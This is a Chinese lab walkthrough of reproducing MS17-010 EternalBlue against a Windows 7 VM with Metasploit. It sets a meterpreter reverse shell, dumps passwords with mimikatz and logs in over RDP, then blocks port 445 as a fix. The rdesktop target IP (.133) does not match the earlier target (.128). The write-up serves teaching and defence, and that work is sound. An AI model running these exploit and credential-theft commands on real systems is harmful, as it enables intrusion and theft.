二、环境搭建
测试环境:攻击机:kail(192.168.132.132)
靶机:win7 x64(192.168.132.128)
虚拟机:VMware workstation
2.1 利用VMware workstation搭建MS17_010漏洞环境
1)为保证虚拟机下的win7和kail能互相ping通,要做2步
第一步:虚拟机下的win7和kail都设置为桥接模式
第二步:把win7的防火墙关了:控制面板-系统和安全-windows防火墙-打开或关闭windows防火墙
2) 为保证虚拟机下的win7的445端口打开
三、漏洞复现
利用kail的msf进行攻击。
3.1 启动msf
root@kali:~# msfconsole
3.2 寻找ms17_010漏洞
msf5 > search ms17_010
msf5 > use 2【利用2漏洞】
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options【显示配置】
3.3 配置【目标地址RHOST】【PAYLOAD】【本地地址LHOST】
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.132.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.132.132
四、攻击
4.1 利用meterpreter进行攻击
查看权限:meterpreter > getuid
桌面截图:meterpreter > screenshot
4.2拿到对方系统所有用户的用户名/密码,只需2步
第一步:用meterpreter中的mimikatz模块密码
meterpreter > load mimikatz
第二步:获取用户密码
meterpreter > wdigest
4.3.远程桌面连接,另起终端,可以在对方主机上做任何事
root@kali:~# rdesktop 192.168.132.133 -u xuanxi -p 123456
五、加固后检查
使用策略封闭445端口进行抵御
5.1 加固
1.win7 ctrl+R打开运行窗口,输入gpedit打开本地安全策略
2.计算机配置–windows设置–安全设置–IP安全策略
3.右键创建新安全策略,一直下一步,直到IP筛选列表
4. 一直下一步,直到以下这一步,点击“添加”
- 一直点下一步,直到以下这一步,目标地址,选择“我的IP地址”
6.选择协议类型,“tcp”
7.一直下一步,直到以下这一步,端口“445”
8.一直下一步,直到“完成”,列表上会新加一行
9.把刚才加的添加上
10.一直点下一步,直到以下,选择“阻止”
11.完成,然后右击,选择“分配”
5.2检查
再用msf攻击一遍
攻击失败,升级成功。